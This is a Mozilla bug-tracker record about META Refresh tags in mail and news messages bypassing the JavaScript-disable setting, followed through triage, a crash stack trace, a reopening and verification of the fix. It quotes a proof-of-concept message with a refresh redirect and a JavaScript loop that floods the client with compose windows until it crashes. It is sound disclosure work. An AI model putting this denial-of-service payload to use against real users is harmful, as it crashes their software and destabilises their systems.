Closed Bug 28612 Opened 25 years ago Closed 25 years ago

META Refresh allowed in Mail/News

Categories

(MailNews Core :: Security, defect, P3)

Product:
MailNews Core
Component:
Security
Platform:
x86
Windows 98
Type:
defect

Tracking

(Not tracked)

Status:
VERIFIED FIXED

People

(Reporter: icos, Assigned: norrisboyd)

Details

(Whiteboard: [PDT+])

A recent post by Jerry Baker to Netscape.public.mozilla.seamonkey brought to my attention a serious flaw in Communicator and Seamonkey: META Refresh tags are allowed in newsgroup and email messages. This is a big security hazard. Here is the source of Jerry Baker's message. --begin-- Path: secnews.netscape.com!not-for-mail From: Jerry Baker <jbaker6953@yahoo.com> Newsgroups: netscape.public.mozilla.seamonkey Subject: Re: Related to "Mail reader allows spammers to set cookies to track web usage" Date: Sun, 20 Feb 2000 09:57:16 -0800 Organization: Another Netscape Collabra Server User Lines: 20 Message-ID: <38B02AFC.315FB2B@weirdness.com> References: <38B02236.13D10AE8@weirdness.com> NNTP-Posting-Host: lsanca1-ar3-145-172.dsl.gtei.net Mime-Version: 1.0 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 4.71 [en] (WinNT; U) X-Accept-Language: en <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <meta http-equiv="Refresh" content="0;url=http://www.cadcamcomputers.com/jerry/mailto_dos.html"> Jerry Baker wrote: <blockquote TYPE=CITE>Even more annoying is the potential DOS's that can be caused by calling <br>HTTP url's from mail and news. Read the next post by me in this thread <br>with caution. <p>-- <br>Jerry Baker <p>"I'm too sexy for my code." - Awk Sed Fred.</blockquote> <p><br><b>Netscape</b> will now die. If Mozilla does not, an equally silly DOS can be made for Mozilla. <p>-- <br>Jerry Baker <p>"I'm too sexy for my code." - Awk Sed Fred. <br>&nbsp;</html> --end-- This message opens up a url (http://www.cadcamcomputers.com/jerry/mailto_dos.html) that contains this code. --begin JS code-- function stackattack() { while (true) { msgWindow = window.open ("mailto:","DisplayWindow","toolbar=no,directories=no,menubar=no"); } } --end JS code-- Once you open this message, your browser will be flooded with new "Composition" windows until you run out of memory, Netscape crashes, and makes your system unstable. I reproduced this on Mozilla Feb 19 build, and Communicator 4.61. This is a perfect sneak around the "Enable JavaScript for Mail and News" option in the Advanced section of preferences. As long as META REFRESH is around in mail/news messages, you may as well leave this option out of preferences! I propose that when "Enable JavaScript for Mail and News" is DISABLED, that all META REFRESH tags are disabled, too. When present and allowed to execute, it poses a SERIOUS risk for malicious content.
Reassign to back end (not crypto related).
Assignee: jefft → phil
Component: Security → Back End
Switching back to security which is way more than just crypto, especially since the mail product doesn't even do encryption at this point. Maybe when S/MIME is implemented we can split the security component into "Security: General" and "Security: S/MIME" (see the browser product, with 3 security categories). DOS attacks definitely fall under "security" of one form or another.
Component: Back End → Security
I'll take it.
Assignee: phil → norris
Bulk moving all MailNews Security bugs to new Security: General component. The previous Security component for MailNews will be deleted.
Component: Security → Security: General
Status: NEW → ASSIGNED
Keywords: beta1
Whiteboard: fix available
Target Milestone: M14
Whiteboard: fix available → [PDT+]fix available
Fix checked in.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
par, can you help me verify this?
QA Contact: lchiang → ppandit
Norris modified 10 files for this bug. I will test using a debug and a commerical build tomorrow. Par
tried verifying but someone deleted the original newsgroup message. I tried posting an exact copy, but instead of the message containing Content-Type: text/html; charset=us-ascii view->source tells me that its Content-Type: text/plain; charset=us-ascii
On Windows NT 4.0 Tested today using commerical build and debug build. Using a commerical build, I load the http://www.cadcamcomputers.com/jerry/mailto_dos.html. The CPU immediately goes to 100% and stays there. The application is not usable. When I killed the application from the task bar, the debug window indicated there were over 210 Webshells. Next I started the debug build with the C++ editor. Went to the same URL and this time did a break. Got the following error message and the trace. Unhandled exception in mozilla.exe (MSVCRDT.DLL) 0xC0000005 Access Violation __sbh_free_block(tagHeader * 0x0a7c3294, void * 0x0d7d8920) line 350 + 6 bytes _realloc_base(void * 0x0d7d8920, unsigned int 596) line 101 + 13 bytes realloc_help(void * 0x0d7d8940, unsigned int 560, int 1, const char * 0x00000000, int 0, int 1) line 636 + 16 bytes _realloc_dbg(void * 0x0d7d8940, unsigned int 560, int 1, const char * 0x00000000, int 0) line 806 + 27 bytes realloc(void * 0x0d7d8940, unsigned int 560) line 755 + 19 bytes JS_realloc(JSContext * 0x0d7d75a0, void * 0x0d7d8940, unsigned int 560) line 1032 + 14 bytes js_AllocSlot(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, unsigned long * 0x0012bed0) line 1422 + 20 bytes js_NewScopeProperty(JSContext * 0x0d7d75a0, JSScope * 0x0d7d7520, long 25329248, int (JSContext *, JSObject *, long, long *)* 0x00497d40 GetWindowProperty(JSContext *, JSObject *, long, long *), int (JSContext *, JSObject *, long, long *)* 0x00499ba0 SetWindowProperty(JSContext *, JSObject *, long, long *), unsigned int 0) line 458 + 20 bytes js_DefineProperty(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, long 25329248, long 204328752, int (JSContext *, JSObject *, long, long *)* 0x00497d40 GetWindowProperty(JSContext *, JSObject *, long, long *), int (JSContext *, JSObject *, long, long *)* 0x00499ba0 SetWindowProperty(JSContext *, JSObject *, long, long *), unsigned int 0, JSProperty * * 0x00000000) line 1576 + 29 by js_DefineFunction(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, JSAtom * 0x01827e60, int (JSContext *, JSObject *, unsigned int, long *, long *)* 0x00314948 str_uneval(JSContext *, JSObject *, unsigned int, long *, long *), unsigned int 1, unsigned int 0) line 1646 + 40 bytes JS_DefineFunction(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, const char * 0x0033f594, int (JSContext *, JSObject *, unsigned int, long *, long *)* 0x00314948 str_uneval(JSContext *, JSObject *, unsigned int, long *, long *), unsigned int 1, unsigned int 0) line 2252 + 29 bytes JS_DefineFunctions(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, JSFunctionSpec * 0x0033f328) line 2234 + 44 bytes js_InitStringClass(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568) line 2159 + 18 bytes JS_InitStandardClasses(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568) line 1002 + 129 bytes nsJSContext::InitContext(nsJSContext * const 0x0d7d7730, nsIScriptGlobalObject * 0x0d7d7794) line 645 + 30 bytes NS_CreateScriptContext(nsIScriptGlobalObject * 0x0d7d7794, nsIScriptContext * * 0x0d7d3800) line 916 nsDocShell::EnsureScriptEnvironment(nsDocShell * const 0x0d7d3770) line 1711 + 50 bytes nsWebShell::GetInterface(nsWebShell * const 0x0d7d3790, const nsID & {...}, void * * 0x0012c110) line 804 + 16 bytes nsGetInterface::operator()(const nsID & {...}, void * * 0x0012c110) line 37 + 31 bytes nsCOMPtr<nsIScriptGlobalObject>::assign_from_helper(const nsCOMPtr_helper & {...}, const nsID & {...}) line 795 + 18 bytes nsCOMPtr<nsIScriptGlobalObject>::nsCOMPtr<nsIScriptGlobalObject>(const nsCOMPtr_helper & {...}) line 498 GlobalWindowImpl::ReadyOpenedDocShellItem(GlobalWindowImpl * const 0x01ef5530, nsIDocShellTreeItem * 0x0d7d3774, nsIDOMWindow * * 0x0012c5cc) line 2717 + 27 bytes GlobalWindowImpl::OpenInternal(GlobalWindowImpl * const 0x01ef5530, JSContext * 0x01ef09b0, long * 0x08bcdfe0, unsigned int 4, int 1, nsIDOMWindow * * 0x0012c5cc) line 2371 + 25 bytes GlobalWindowImpl::OpenDialog(GlobalWindowImpl * const 0x01ef5538, JSContext * 0x01ef09b0, long * 0x08bcdfe0, unsigned int 4, nsIDOMWindow * * 0x0012c5cc) line 1520 openWindow(const unsigned short * 0x0d7d2150, const unsigned short * 0x0012c640) line 83 + 60 bytes nsMsgComposeService::OpenComposeWindowWithCompFields(nsMsgComposeService * const 0x0d7d2d20, const unsigned short * 0x00000000, int 8, int 0, nsIMsgCompFields * 0x0d7d23a0, nsIMsgIdentity * 0x00000000) line 287 + 46 bytes nsMsgComposeService::OpenComposeWindowWithValues(nsMsgComposeService * const 0x0d7d2d20, const unsigned short * 0x00000000, int 8, int 0, const unsigned short * 0x0012c78c, const unsigned short * 0x0012c98c, const unsigned short * 0x0012c8cc, const unsigned short * 0x0012c824, const unsigned short * 0x0012ca24, const unsigned short * 0x0012cabc, const unsigned short * ...) line 248 nsMsgComposeService::OpenComposeWindowWithURI(nsMsgComposeService * const 0x0d7d2d20, const unsigned short * 0x00000000, nsIURI * 0x0d7d2e74) line 213 + 118 bytes nsMsgComposeService::HandleContent(nsMsgComposeService * const 0x0d7d2d24, const char * 0x0d7d29d0, const char * 0x01a6d270, const char * 0x10083548 gCommonEmptyBuffer, nsIChannel * 0x0d7d2b30) line 364 + 27 bytes nsURILoader::DispatchContent(nsURILoader * const 0x01850390, const char * 0x0d7d29d0, int 0, const char * 0x10083548 gCommonEmptyBuffer, nsIChannel * 0x0d7d2b30, nsISupports * 0x00000000, nsIURIContentListener * 0x09e3aeec, char * * 0x0012cda8, nsIURIContentListener * * 0x0012cdb0, int * 0x0012cda0) line 757 + 49 bytes nsDocumentOpenInfo::DispatchContent(nsIChannel * 0x0d7d2b30, nsISupports * 0x00000000) line 303 + 150 bytes nsDocumentOpenInfo::OnStartRequest(nsDocumentOpenInfo * const 0x0d7d2d60, nsIChannel * 0x0d7d2b30, nsISupports * 0x00000000) line 248 + 16 bytes nsMailtoChannel::AsyncRead(nsMailtoChannel * const 0x0d7d2b30, unsigned int 0, int -1, nsISupports * 0x00000000, nsIStreamListener * 0x0d7d2d60) line 326 nsDocumentOpenInfo::Open(nsIChannel * 0x0d7d2b30, int 0, const char * 0x00000000, nsISupports * 0x09e3aed0) line 241 + 22 bytes nsURILoader::OpenURIVia(nsURILoader * const 0x01850390, nsIChannel * 0x0d7d2b30, int 0, const char * 0x00000000, nsISupports * 0x09e3aed0, unsigned int 0) line 567 + 29 bytes nsURILoader::OpenURI(nsURILoader * const 0x01850390, nsIChannel * 0x0d7d2b30, int 0, const char * 0x00000000, nsISupports * 0x09e3aed0) line 487 nsWebShell::DoLoadURL(nsIURI * 0x0d7d2e74, const char * 0x00380fcc, nsIInputStream * 0x00000000, unsigned int 0, const unsigned int 0, const unsigned short * 0x0012d9f4, const char * 0x00000000, int 1) line 1699 + 104 bytes nsWebShell::LoadURI(nsWebShell * const 0x09e3aed0, nsIURI * 0x0d7d2e74, const char * 0x00380fcc, nsIInputStream * 0x00000000, int 1, unsigned int 0, const unsigned int 0, nsISupports * 0x00000000, const unsigned short * 0x0012d9f4, const char * 0x00000000) line 1981 + 44 bytes nsWebShell::LoadURL(nsWebShell * const 0x09e3aed0, const unsigned short * 0x0012dc14, const char * 0x00380fcc, nsIInputStream * 0x00000000, int 1, unsigned int 0, const unsigned int 0, nsISupports * 0x00000000, const unsigned short * 0x0012d9f4, const char * 0x00000000) line 2205 + 53 bytes nsWebShell::LoadURL(nsWebShell * const 0x09e3aed0, const unsigned short * 0x0012dc14, nsIInputStream * 0x00000000, int 1, unsigned int 0, const unsigned int 0, nsISupports * 0x00000000, const unsigned short * 0x0012d9f4) line 1438 GlobalWindowImpl::OpenInternal(GlobalWindowImpl * const 0x0806c7e0, JSContext * 0x0806a400, long * 0x08dadfe8, unsigned int 3, int 0, nsIDOMWindow * * 0x0012dd10) line 2414 GlobalWindowImpl::Open(GlobalWindowImpl * const 0x0806c7e8, JSContext * 0x0806a400, long * 0x08dadfe8, unsigned int 3, nsIDOMWindow * * 0x0012dd10) line 1512 WindowOpen(JSContext * 0x0806a400, JSObject * 0x00f367a0, unsigned int 3, long * 0x08dadfe8, long * 0x0012ddd0) line 2558 + 31 bytes js_Invoke(JSContext * 0x0806a400, unsigned int 3, unsigned int 0) line 665 + 26 bytes js_Interpret(JSContext * 0x0806a400, long * 0x0012e6bc) line 2292 + 15 bytes js_Invoke(JSContext * 0x0806a400, unsigned int 0, unsigned int 0) line 681 + 13 bytes js_Interpret(JSContext * 0x0806a400, long * 0x0012ef64) line 2292 + 15 bytes js_Invoke(JSContext * 0x0806a400, unsigned int 1, unsigned int 2) line 681 + 13 bytes js_InternalInvoke(JSContext * 0x0806a400, JSObject * 0x00f367a0, long 118062744, unsigned int 0, unsigned int 1, long * 0x0012f0f0, long * 0x0012f09c) line 754 + 19 bytes JS_CallFunctionValue(JSContext * 0x0806a400, JSObject * 0x00f367a0, long 118062744, unsigned int 1, long * 0x0012f0f0, long * 0x0012f09c) line 2787 + 31 bytes nsJSContext::CallEventHandler(nsJSContext * const 0x0806a670, void * 0x00f367a0, void * 0x07097e98, unsigned int 1, void * 0x0012f0f0, int * 0x0012f0ec) line 562 + 33 bytes nsJSEventListener::HandleEvent(nsIDOMEvent * 0x081f9c74) line 128 + 57 bytes nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x080b06a0, nsIDOMEvent * 0x081f9c74, unsigned int 1, unsigned int 7) line 697 + 19 bytes nsEventListenerManager::HandleEvent(nsIPresContext * 0x09e10680, nsEvent * 0x0012fbac, nsIDOMEvent * * 0x0012f504, unsigned int 7, nsEventStatus * 0x0012fbec) line 1248 + 35 bytes GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x0806c7e4, nsIPresContext * 0x09e10680, nsEvent * 0x0012fbac, nsIDOMEvent * * 0x0012f504, unsigned int 1, nsEventStatus * 0x0012fbec) line 376 nsWebShell::OnEndDocumentLoad(nsWebShell * const 0x08078ee0, nsIDocumentLoader * 0x08079960, nsIChannel * 0x09e22c30, unsigned int 0) line 2954 + 51 bytes nsDocLoaderImpl::FireOnEndDocumentLoad(nsDocLoaderImpl * 0x08079960, nsIChannel * 0x09e22c30, unsigned int 0) line 603 nsDocLoaderImpl::DocLoaderIsEmpty(unsigned int 0) line 494 nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x08079964, nsIChannel * 0x09e22c30, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 0x00000000) line 438 nsLoadGroup::RemoveChannel(nsLoadGroup * const 0x08079900, nsIChannel * 0x09e22c30, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 0x00000000) line 535 + 42 bytes nsHTTPChannel::ResponseCompleted(nsIChannel * 0x09de91b4, nsIStreamListener * 0x09e119a0, unsigned int 0, const unsigned short * 0x00000000) line 1361 nsHTTPResponseListener::OnStopRequest(nsHTTPResponseListener * const 0x09e10e00, nsIChannel * 0x09de91b4, nsISupports * 0x09e22c30, unsigned int 0, const unsigned short * 0x00000000) line 260 nsOnStopRequestEvent::HandleEvent(nsOnStopRequestEvent * const 0x09e12c40) line 283 nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x09e12bf0) line 97 + 12 bytes PL_HandleEvent(PLEvent * 0x09e12bf0) line 526 + 10 bytes PL_ProcessPendingEvents(PLEventQueue * 0x01009e30) line 487 + 9 bytes _md_EventReceiverProc(HWND__ * 0x001201be, unsigned int 49356, unsigned int 0, long 16817712) line 975 + 9 bytes USER32! 77e71820() 01009e30()
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
ppandit, this bug doesn't have to do with whether http://www.cadcamcomputers.com/jerry/mailto_dos.html causes a crash or not, it has to do with whether a META REFRESH tag within a newsgroup or mail message can cause a URL (such as that) to automatically open. build 2000022408 (win32) still opens up this URL when visiting the newsgroup message in netscape.public.test titled "This should crash" (last message posted by yours truly, Andrew Niese) so, this is not fixed.
> this bug doesn't have to do with whether > http://www.cadcamcomputers.com/jerry/mailto_dos.html causes a crash or not FYI: I didn't read the previous comments carefully enough or not at all, thought the URL would show a /description/ of the attack, not the attack itself, and opened it. 4.7 Linux is vulnerable and also caused my window manager to crash.
A browser-only, but related and interesting bug in 4.7: If I didn't overlook something, I was able to close all related windows (i.e. the window, which loaded the URL, the (browser) window etc.), but the attack didn't stop. The attacking (new) browser window came up again and again. I was not able to reproduce this bug (executing REFRESHs for windows, which don't exist anymore) with Mozilla 2000-02-17, because no new windows were opened at all, just lots of |webshell += <count>|'s on the console. If a similar bug exists in Mozilla, I'd like to file a bug on this.
Verified fixed on 2/27 (win32) build. Great work! Can someone PLEASE send this bugzilla URL to someone who does bugfixes for Netscape Communicator 4.x? If there are any further releases of 4.x, then this should be addressed, if possible.
Status: REOPENED → RESOLVED
Closed: 25 years ago25 years ago
Resolution: --- → FIXED
Verifying.
Status: RESOLVED → VERIFIED
Using windows commerical build from 2/28, I am getting the same issue as before. CPU is at 100% after loading the URL. The application is basically unusable. Looks like we prevent multiple windows from coming but if the application cannot do anything now, it is really a fix? Was any code check in?
ppandit, did you load the URL in the browser or did you open the example msg in Mailnews? This bug is about the latter.
Whiteboard: [PDT+]fix available → [PDT+]
Okay, I tried the sample message from the newsgroup with today's debug mozilla.build and had no problem. I agree with the VERIFIED status.
Product: MailNews → Core
Product: Core → MailNews Core
You need to log in before you can comment on or make changes to this bug.